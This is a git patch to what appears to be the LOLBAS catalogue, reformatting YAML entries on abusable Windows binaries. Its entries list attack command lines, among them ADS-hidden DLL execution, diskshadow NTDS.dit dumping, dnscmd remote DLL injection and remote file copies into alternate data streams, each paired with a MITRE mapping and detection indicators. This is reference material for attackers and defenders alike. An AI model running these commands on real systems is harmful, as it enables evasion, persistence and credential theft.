From 37cc1ee83e27b0148d3523426fd8786c93481623 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Mon, 24 Sep 2018 21:59:43 +0200 Subject: [PATCH] Changed all OSBinaries according to the new template --- Mgmt-Scripts/Draft-MDFromYaml-webportal.ps1 | 22 +++-- OSBinaries/Control.exe.md | 2 +- OSBinaries/Csc.exe.md | 2 +- OSBinaries/Cscript.exe.md | 2 +- yml/{ => LOLUtilz}/OSBinaries/Explorer.yml | 0 yml/{ => LOLUtilz}/OSBinaries/Netsh.yml | 0 yml/{ => LOLUtilz}/OSBinaries/Nltest.yml | 0 yml/{ => LOLUtilz}/OSBinaries/Openwith.yml | 0 yml/{ => LOLUtilz}/OSBinaries/Powershell.yml | 0 yml/{ => LOLUtilz}/OSBinaries/Psr.yml | 0 yml/{ => LOLUtilz}/OSBinaries/Robocopy.yml | 0 yml/OSBinaries/Atbroker.yml | 4 +- yml/OSBinaries/Bash.yml | 4 +- yml/OSBinaries/Bitsadmin.yml | 6 +- yml/OSBinaries/Certutil.yml | 4 +- yml/OSBinaries/Cmdkey.yml | 4 +- yml/OSBinaries/Cmstp.yml | 4 +- yml/OSBinaries/Control.yml | 36 ++++--- yml/OSBinaries/Csc.yml | 40 +++++--- yml/OSBinaries/Cscript.yml | 31 +++--- yml/OSBinaries/Dfsvc.yml | 36 ++++--- yml/OSBinaries/Diskshadow.yml | 38 +++++--- yml/OSBinaries/Dns.yml | 27 ------ yml/OSBinaries/Dnscmd.yml | 35 +++++++ yml/OSBinaries/Esentutl.yml | 59 +++++++++--- yml/OSBinaries/Expand.yml | 51 +++++++--- yml/OSBinaries/Extexport.yml | 31 +++--- yml/OSBinaries/Extrac32.yml | 53 ++++++++--- yml/OSBinaries/Findstr.yml | 59 +++++++++--- yml/OSBinaries/Forfiles.yml | 45 ++++++--- yml/OSBinaries/Gpscript.yml | 42 ++++++--- yml/OSBinaries/Hh.yml | 44 +++++---- yml/OSBinaries/Ie4unit.yml | 35 ++++--- yml/OSBinaries/Ieexec.yml | 43 ++++++--- yml/OSBinaries/Infdefaultinstall.yml | 36 ++++--- yml/OSBinaries/Installutil.yml | 55 +++++++---- yml/OSBinaries/Makecab.yml | 46 ++++++--- yml/OSBinaries/Mavinject.yml | 43 ++++++--- yml/OSBinaries/Msbuild.yml | 57 +++++++---- yml/OSBinaries/Msconfig.yml | 30 +++--- yml/OSBinaries/Msdt.yml | 48 ++++++---- yml/OSBinaries/Mshta.yml | 61 ++++++++---- yml/OSBinaries/Msiexec.yml | 51 +++++++--- yml/OSBinaries/Odbcconf.yml | 38 ++++---- yml/OSBinaries/Pcalua.yml | 44 ++++++--- yml/OSBinaries/Pcwrun.yml | 27 ++++-- yml/OSBinaries/Presentationhost.yml | 35 ++++--- yml/OSBinaries/Print.yml | 44 ++++++--- yml/OSBinaries/Reg.yml | 33 ++++--- yml/OSBinaries/Regasm.yml | 50 ++++++---- yml/OSBinaries/Regedit.yml | 38 +++++--- yml/OSBinaries/Register-cimprovider.yml | 29 ++++-- yml/OSBinaries/Regsvcs.yml | 44 ++++++--- yml/OSBinaries/Regsvr32.yml | 58 +++++++++--- yml/OSBinaries/Replace.yml | 41 +++++--- yml/OSBinaries/Rpcping.yml | 40 ++++---- yml/OSBinaries/Rundll32.yml | 68 +++++++++++--- yml/OSBinaries/Runonce.yml | 34 ++++--- yml/OSBinaries/Runscripthelper.yml | 31 ++++-- yml/OSBinaries/Sc.yml | 36 ++++--- yml/OSBinaries/Scriptrunner.yml | 42 ++++++--- yml/OSBinaries/Syncappvpublishingserver.yml | 27 ++++-- yml/OSBinaries/Wab.yml | 38 +++++--- yml/OSBinaries/Wmic.yml | 99 ++++++++++++++------ yml/OSBinaries/Wscript.yml | 30 ++++-- yml/OSBinaries/Xwizard.yml | 34 ++++--- 66 files changed, 1448 insertions(+), 698 deletions(-) rename yml/{ => LOLUtilz}/OSBinaries/Explorer.yml (100%) rename yml/{ => LOLUtilz}/OSBinaries/Netsh.yml (100%) rename yml/{ => LOLUtilz}/OSBinaries/Nltest.yml (100%) rename yml/{ => LOLUtilz}/OSBinaries/Openwith.yml (100%) rename yml/{ => LOLUtilz}/OSBinaries/Powershell.yml (100%) rename yml/{ => LOLUtilz}/OSBinaries/Psr.yml (100%) rename yml/{ => LOLUtilz}/OSBinaries/Robocopy.yml (100%) delete mode 100644 yml/OSBinaries/Dns.yml create mode 100644 yml/OSBinaries/Dnscmd.yml diff --git a/Mgmt-Scripts/Draft-MDFromYaml-webportal.ps1 b/Mgmt-Scripts/Draft-MDFromYaml-webportal.ps1 index 3b242bc..13f903f 100644 --- a/Mgmt-Scripts/Draft-MDFromYaml-webportal.ps1 +++ b/Mgmt-Scripts/Draft-MDFromYaml-webportal.ps1 @@ -30,11 +30,15 @@ function Convert-YamlToMD "description: $($YamlObject.Description)"| Add-Content $Outfile "function:"| Add-Content $Outfile # Need a category linked to the different things... Execute, Download, AWL-bypass. - " execute:"| Add-Content $Outfile + foreach($cmd in $YamlObject.Commands) { - " - description: $($cmd.description)"| Add-Content $Outfile - " code: $($cmd.command)"| Add-Content $Outfile + " $($cmd.Category):"| Add-Content $Outfile + " - description: $($cmd.Description)"| Add-Content $Outfile + " code: $($cmd.Command)"| Add-Content $Outfile + " code: $($cmd.Command)"| Add-Content $Outfile + " mitreid: $($cmd.MitreID)"| Add-Content $Outfile + " mitrelink: $($cmd.MitreLink)"| Add-Content $Outfile } "resources:"| Add-Content $Outfile foreach($link in $YamlObject.Resources) @@ -108,13 +112,11 @@ function Invoke-GenerateMD #Generate the stuff! #Bins -Invoke-GenerateMD -YmlPath "$mainpath\yml\OSBinaries" -Outpath "c:\tamp\Binaries" -Verbose +#Invoke-GenerateMD -YmlPath "$mainpath\yml\OSBinaries" -Outpath "c:\tamp\Binaries" -Verbose Invoke-GenerateMD -YmlPath "$mainpath\yml\OtherMSBinaries" -Outpath "c:\tamp\OtherMSBinaries" -Verbose -Invoke-GenerateMD -YmlPath "$mainpath\yml\OtherBinaries" -Outpath "c:\tamp\OtherBinaries" -Verbose -# + ##Scripts -Invoke-GenerateMD -YmlPath "$mainpath\yml\OSScripts" -Outpath "c:\tamp\SCripts" -Verbose -Invoke-GenerateMD -YmlPath "$mainpath\yml\OtherScripts" -Outpath "c:\tamp\OtherScripts" -Verbose -# +#Invoke-GenerateMD -YmlPath "$mainpath\yml\OSScripts" -Outpath "c:\tamp\SCripts" -Verbose + ##Libs -Invoke-GenerateMD -YmlPath "$mainpath\yml\OSLibraries" -Outpath "c:\tamp\Libraries" -Verbose \ No newline at end of file +#Invoke-GenerateMD -YmlPath "$mainpath\yml\OSLibraries" -Outpath "c:\tamp\Libraries" -Verbose \ No newline at end of file diff --git a/OSBinaries/Control.exe.md b/OSBinaries/Control.exe.md index db22b70..c7fc0bd 100644 --- a/OSBinaries/Control.exe.md +++ b/OSBinaries/Control.exe.md @@ -17,4 +17,4 @@ Execute evil.dll which is stored in an Alternate Data Stream (ADS). * C:\Windows\sysWOW64\control.exe * Notes: Thanks to Jimmy - @bohops - + \ No newline at end of file diff --git a/OSBinaries/Csc.exe.md b/OSBinaries/Csc.exe.md index 5b0afe4..8451894 100644 --- a/OSBinaries/Csc.exe.md +++ b/OSBinaries/Csc.exe.md @@ -18,4 +18,4 @@ csc -target:library File.cs * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe * Notes: Thanks to ? - + \ No newline at end of file diff --git a/OSBinaries/Cscript.exe.md b/OSBinaries/Cscript.exe.md index e8483cf..d4c67f2 100644 --- a/OSBinaries/Cscript.exe.md +++ b/OSBinaries/Cscript.exe.md @@ -15,4 +15,4 @@ Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data St * c:\windows\sysWOW64\cscript.exe * Notes: Thanks to Oddvar Moe - @oddvarmoe - + \ No newline at end of file diff --git a/yml/OSBinaries/Explorer.yml b/yml/LOLUtilz/OSBinaries/Explorer.yml similarity index 100% rename from yml/OSBinaries/Explorer.yml rename to yml/LOLUtilz/OSBinaries/Explorer.yml diff --git a/yml/OSBinaries/Netsh.yml b/yml/LOLUtilz/OSBinaries/Netsh.yml similarity index 100% rename from yml/OSBinaries/Netsh.yml rename to yml/LOLUtilz/OSBinaries/Netsh.yml diff --git a/yml/OSBinaries/Nltest.yml b/yml/LOLUtilz/OSBinaries/Nltest.yml similarity index 100% rename from yml/OSBinaries/Nltest.yml rename to yml/LOLUtilz/OSBinaries/Nltest.yml diff --git a/yml/OSBinaries/Openwith.yml b/yml/LOLUtilz/OSBinaries/Openwith.yml similarity index 100% rename from yml/OSBinaries/Openwith.yml rename to yml/LOLUtilz/OSBinaries/Openwith.yml diff --git a/yml/OSBinaries/Powershell.yml b/yml/LOLUtilz/OSBinaries/Powershell.yml similarity index 100% rename from yml/OSBinaries/Powershell.yml rename to yml/LOLUtilz/OSBinaries/Powershell.yml diff --git a/yml/OSBinaries/Psr.yml b/yml/LOLUtilz/OSBinaries/Psr.yml similarity index 100% rename from yml/OSBinaries/Psr.yml rename to yml/LOLUtilz/OSBinaries/Psr.yml diff --git a/yml/OSBinaries/Robocopy.yml b/yml/LOLUtilz/OSBinaries/Robocopy.yml similarity index 100% rename from yml/OSBinaries/Robocopy.yml rename to yml/LOLUtilz/OSBinaries/Robocopy.yml diff --git a/yml/OSBinaries/Atbroker.yml b/yml/OSBinaries/Atbroker.yml index 6709551..8909a81 100644 --- a/yml/OSBinaries/Atbroker.yml +++ b/yml/OSBinaries/Atbroker.yml @@ -13,8 +13,8 @@ Commands: MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10 Full Path: - - path: C:\Windows\System32\Atbroker.exe - - path: C:\Windows\SysWOW64\Atbroker.exe + - Path: C:\Windows\System32\Atbroker.exe + - Path: C:\Windows\SysWOW64\Atbroker.exe Code Sample: - Code: Detection: diff --git a/yml/OSBinaries/Bash.yml b/yml/OSBinaries/Bash.yml index 8611056..a2feced 100644 --- a/yml/OSBinaries/Bash.yml +++ b/yml/OSBinaries/Bash.yml @@ -21,8 +21,8 @@ Commands: MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows 10 Full Path: - - path: C:\Windows\System32\bash.exe - - path: C:\Windows\SysWOW64\bash.exe + - Path: C:\Windows\System32\bash.exe + - Path: C:\Windows\SysWOW64\bash.exe Code Sample: - Code: Detection: diff --git a/yml/OSBinaries/Bitsadmin.yml b/yml/OSBinaries/Bitsadmin.yml index 637331a..700a074 100644 --- a/yml/OSBinaries/Bitsadmin.yml +++ b/yml/OSBinaries/Bitsadmin.yml @@ -1,5 +1,5 @@ --- -Name: bitsadmin.exe +Name: Bitsadmin.exe Description: Used for managing background intelligent transfer Author: 'Oddvar Moe' Created: '2018-05-25' @@ -37,8 +37,8 @@ Commands: MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - path: C:\Windows\System32\bitsadmin.exe - - path: C:\Windows\SysWOW64\bitsadmin.exe + - Path: C:\Windows\System32\bitsadmin.exe + - Path: C:\Windows\SysWOW64\bitsadmin.exe Code Sample: - Code: Detection: diff --git a/yml/OSBinaries/Certutil.yml b/yml/OSBinaries/Certutil.yml index daf8482..9990689 100644 --- a/yml/OSBinaries/Certutil.yml +++ b/yml/OSBinaries/Certutil.yml @@ -37,8 +37,8 @@ Commands: MitreLink: https://attack.mitre.org/wiki/Technique/T1140 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - path: C:\Windows\System32\certutil.exe - - path: C:\Windows\SysWOW64\certutil.exe + - Path: C:\Windows\System32\certutil.exe + - Path: C:\Windows\SysWOW64\certutil.exe Code Sample: - Code: Detection: diff --git a/yml/OSBinaries/Cmdkey.yml b/yml/OSBinaries/Cmdkey.yml index 045e72d..41ad530 100644 --- a/yml/OSBinaries/Cmdkey.yml +++ b/yml/OSBinaries/Cmdkey.yml @@ -13,8 +13,8 @@ Commands: MitreLink: https://attack.mitre.org/wiki/Technique/T1078 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - path: C:\Windows\System32\cmdkey.exe - - path: C:\Windows\SysWOW64\cmdkey.exe + - Path: C:\Windows\System32\cmdkey.exe + - Path: C:\Windows\SysWOW64\cmdkey.exe Code Sample: - Code: Detection: diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml index 895e235..97d216c 100644 --- a/yml/OSBinaries/Cmstp.yml +++ b/yml/OSBinaries/Cmstp.yml @@ -21,8 +21,8 @@ Commands: MitreLink: https://attack.mitre.org/wiki/Technique/T1191 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - path: C:\Windows\System32\cmstp.exe - - path: C:\Windows\SysWOW64\cmstp.exe + - Path: C:\Windows\System32\cmstp.exe + - Path: C:\Windows\SysWOW64\cmstp.exe Code Sample: - Code: Detection: diff --git a/yml/OSBinaries/Control.yml b/yml/OSBinaries/Control.yml index 9c97e39..f22db61 100644 --- a/yml/OSBinaries/Control.yml +++ b/yml/OSBinaries/Control.yml @@ -1,21 +1,31 @@ --- Name: Control.exe -Description: Execute, Read ADS -Author: '' +Description: Binary used to launch controlpanel items in Windows +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: control.exe c:\windows\tasks\file.txt:evil.dll Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS). + Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism + Category: Alternate data streams + Privileges: User + MitreID: T1196 + MitreLink: https://attack.mitre.org/wiki/Technique/T1196 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - 'C:\Windows\system32\control.exe ' - - 'C:\Windows\sysWOW64\control.exe ' -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\control.exe + - Path: C:\Windows\SysWOW64\control.exe +Code Sample: +- Code: +Detection: + - IOC: Control.exe executing files from alternate data streams. Resources: - - https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/ - - https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/ - - https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/ - - https://twitter.com/bohops/status/955659561008017409 -Notes: Thanks to Jimmy - @bohops - + - Link: https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/ + - Link: https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/ + - Link: https://twitter.com/bohops/status/955659561008017409 + - Link: https://docs.microsoft.com/en-us/windows/desktop/shell/executing-control-panel-items + - Link: https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/ +Acknowledgement: + - Person: Jimmy + Handle: '@bohops' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Csc.yml b/yml/OSBinaries/Csc.yml index f90575b..00b3973 100644 --- a/yml/OSBinaries/Csc.yml +++ b/yml/OSBinaries/Csc.yml @@ -1,21 +1,35 @@ --- Name: Csc.exe -Description: Compile -Author: '' +Description: Binary file used by .NET to compile C# code +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - - Command: csc -out:My.exe File.cs + - Command: csc.exe -out:My.exe File.cs Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe. + Usecase: Compile attacker code on system. Bypass defensive counter measures. + Category: Compile + Privileges: User + MitreID: T1127 + MitreLink: https://attack.mitre.org/wiki/Technique/T1127 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: csc -target:library File.cs - Description: '' + Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to a dll file. + Usecase: Compile attacker code on system. Bypass defensive counter measures. + Category: Compile + Privileges: User + MitreID: T1127 + MitreLink: https://attack.mitre.org/wiki/Technique/T1127 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe +Code Sample: +- Code: +Detection: + - IOC: Csc.exe should normally not run a system unless it is used for development. Resources: - - https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe - - '' -Notes: Thanks to ? - + - Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe +Acknowledgement: + - Person: + Handle: +--- \ No newline at end of file diff --git a/yml/OSBinaries/Cscript.yml b/yml/OSBinaries/Cscript.yml index 757ee19..a00b7e3 100644 --- a/yml/OSBinaries/Cscript.yml +++ b/yml/OSBinaries/Cscript.yml @@ -1,19 +1,28 @@ --- Name: Cscript.exe -Description: Execute, Read ADS -Author: '' +Description: Binary used to execute scripts in Windows +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: cscript c:\ads\file.txt:script.vbs Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS). + Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\cscript.exe - - c:\windows\sysWOW64\cscript.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\cscript.exe + - Path: C:\Windows\SysWOW64\cscript.exe +Code Sample: +- Code: +Detection: + - IOC: Cscript.exe executing files from alternate data streams Resources: - - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f - - https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ -Notes: Thanks to Oddvar Moe - @oddvarmoe - + - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f + - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ +Acknowledgement: + - Person: Oddvar Moe + Handle: '@oddvarmoe' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Dfsvc.yml b/yml/OSBinaries/Dfsvc.yml index 463b03d..4364f31 100644 --- a/yml/OSBinaries/Dfsvc.yml +++ b/yml/OSBinaries/Dfsvc.yml @@ -1,19 +1,29 @@ --- Name: Dfsvc.exe -Description: Execute -Author: '' +Description: ClickOnce engine in Windows used by .NET +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - - Command: Missing Example - Description: '' + - Command: Missing Example + Description: Missing example + Usecase: Use binary to bypass Application whitelisting + Category: AWL bypass + Privileges: User + MitreID: T1127 + MitreLink: https://attack.mitre.org/wiki/Technique/T1127 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe ' - - 'C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe ' - - 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe ' - - 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe ' -Code Sample: [] -Detection: [] + - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe + - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe +Code Sample: +- Code: +Detection: + - IOC: Resources: - - https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf -Notes: Thanks to Casey Smith - @subtee + - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf +Acknowledgement: + - Person: Casey Smith + Handle: '@subtee' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Diskshadow.yml b/yml/OSBinaries/Diskshadow.yml index d57c043..1cfdcb1 100644 --- a/yml/OSBinaries/Diskshadow.yml +++ b/yml/OSBinaries/Diskshadow.yml @@ -1,20 +1,36 @@ --- Name: Diskshadow.exe -Description: Execute, Dump NTDS.dit -Author: '' +Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS). +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: diskshadow.exe /s c:\test\diskshadow.txt Description: Execute commands using diskshadow.exe from a prepared diskshadow script. + Usecase: Use diskshadow to exfiltrate data from VSS such as NTDS.dit + Category: Dump + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows server - Command: diskshadow> exec calc.exe - Description: Execute a calc.exe using diskshadow.exe. + Description: Execute commands using diskshadow.exe to spawn child process + Usecase: Use diskshadow to bypass defensive counter measures + Category: Execute + Privileges: User + MitreID: T1003 + MitreLink: https://attack.mitre.org/wiki/Technique/T1003 + OperatingSystem: Windows server Full Path: - - c:\windows\system32\diskshadow.exe - - c:\windows\sysWOW64\diskshadow.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\diskshadow.exe + - Path: C:\Windows\SysWOW64\diskshadow.exe +Code Sample: +- Code: +Detection: + - IOC: Child process from diskshadow.exe + - IOC: Diskshadow reading input from file Resources: - - https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ -Notes: Thanks to Jimmy - @bohops - + - Link: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ +Acknowledgement: + - Person: Jimmy + Handle: '@bohops' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Dns.yml b/yml/OSBinaries/Dns.yml deleted file mode 100644 index 8afb67b..0000000 --- a/yml/OSBinaries/Dns.yml +++ /dev/null @@ -1,27 +0,0 @@ ---- -Name: Dnscmd.exe -Description: Execute -Author: '' -Created: '2018-05-25' -Categories: [] -Commands: - - Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll - Description: 'Adds a specially crafted DLL as a plug-in of the DNS Service.' -Full Path: - - c:\windows\system32\Dnscmd.exe - - c:\windows\sysWOW64\Dnscmd.exe -Code Sample: [] -Detection: [] -Resources: - - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 - - https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html - - https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp - - https://twitter.com/Hexacorn/status/994000792628719618 - - http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html -Notes: | - This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the refference links for DLL details. - Thanks to Shay Ber - ?, - Dimitrios Slamaris - @dim0x69, - Nikhil SamratAshok, - Mittal - @nikhil_mitt - diff --git a/yml/OSBinaries/Dnscmd.yml b/yml/OSBinaries/Dnscmd.yml new file mode 100644 index 0000000..835c371 --- /dev/null +++ b/yml/OSBinaries/Dnscmd.yml @@ -0,0 +1,35 @@ +--- +Name: Dnscmd.exe +Description: A command-line interface for managing DNS servers +Author: 'Oddvar Moe' +Created: '2018-05-25' +Commands: + - Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll + Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details. + Usecase: Remotly inject dll to dns server + Category: Execute + Privileges: DNS admin + MitreID: T1035 + MitreLink: https://attack.mitre.org/wiki/Technique/T1035 + OperatingSystem: Windows server +Full Path: + - Path: C:\Windows\System32\Dnscmd.exe + - Path: C:\Windows\SysWOW64\Dnscmd.exe +Code Sample: +- Code: +Detection: + - IOC: Dnscmd.exe loading dll from UNC path +Resources: + - Link: https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 + - Link: https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html + - Link: https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp + - Link: https://twitter.com/Hexacorn/status/994000792628719618 + - Link: http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html +Acknowledgement: + - Person: Shay Ber + Handle: + - Person: Dimitrios Slamaris + Handle: '@dim0x69' + - Person: Nikhil SamratAshok + Handle: '@nikhil_mitt' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Esentutl.yml b/yml/OSBinaries/Esentutl.yml index 2347837..bc3938d 100644 --- a/yml/OSBinaries/Esentutl.yml +++ b/yml/OSBinaries/Esentutl.yml @@ -1,28 +1,59 @@ --- Name: Esentutl.exe -Description: Copy, Download, Write ADS, Read ADS -Author: '' +Description: Binary for working with Microsoft Joint Engine Technology (JET) database +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o Description: Copies the source VBS file to the destination VBS file. + Usecase: Copies files from A to B + Category: Copy + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination file. + Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o Description: Copies the source Alternate Data Stream (ADS) to the destination EXE. - - Command: esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.txt:file.exe /o - Description: Copies the source EXE to the destination Alternate Data Stream (ADS) of the destination file. - - Command: esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.exe /o - Description: Copies the source EXE to the destination EXE file. + Usecase: Extract hidden file within alternate data streams + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o + Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file. + Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o Description: Copies the source EXE to the destination EXE file + Usecase: Use to copy files from one unc path to another + Category: Download + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\esentutl.exe - - c:\windows\sysWOW64\esentutl.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\esentutl.exe + - Path: C:\Windows\SysWOW64\esentutl.exe +Code Sample: +- Code: +Detection: + - IOC: Resources: - - https://twitter.com/egre55/status/985994639202283520 -Notes: Thanks to egre55 - @egre55 - + - Link: https://twitter.com/egre55/status/985994639202283520 +Acknowledgement: + - Person: egre55 + Handle: '@egre55' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Expand.yml b/yml/OSBinaries/Expand.yml index dea7d4b..fc2a4d5 100644 --- a/yml/OSBinaries/Expand.yml +++ b/yml/OSBinaries/Expand.yml @@ -1,23 +1,46 @@ --- Name: Expand.exe -Description: Download, Copy, Add ADS -Author: '' +Description: Binary that expands one or more compressed files +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: expand \\webdav\folder\file.bat c:\ADS\file.bat - Description: 'Copies source file to destination.' + Description: Copies source file to destination. + Usecase: Use to copies the source file to the destination file + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: expand c:\ADS\file1.bat c:\ADS\file2.bat - Description: 'Copies source file to destination.' + Description: Copies source file to destination. + Usecase: Copies files from A to B + Category: Copy + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat - Description: 'Copies source file to destination Alternate Data Stream (ADS).' + Description: Copies source file to destination Alternate Data Stream (ADS) + Usecase: Copies files from A to B + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\Expand.exe - - c:\windows\sysWOW64\Expand.exe -Code Sample: [] -Detection: [] + - Path: 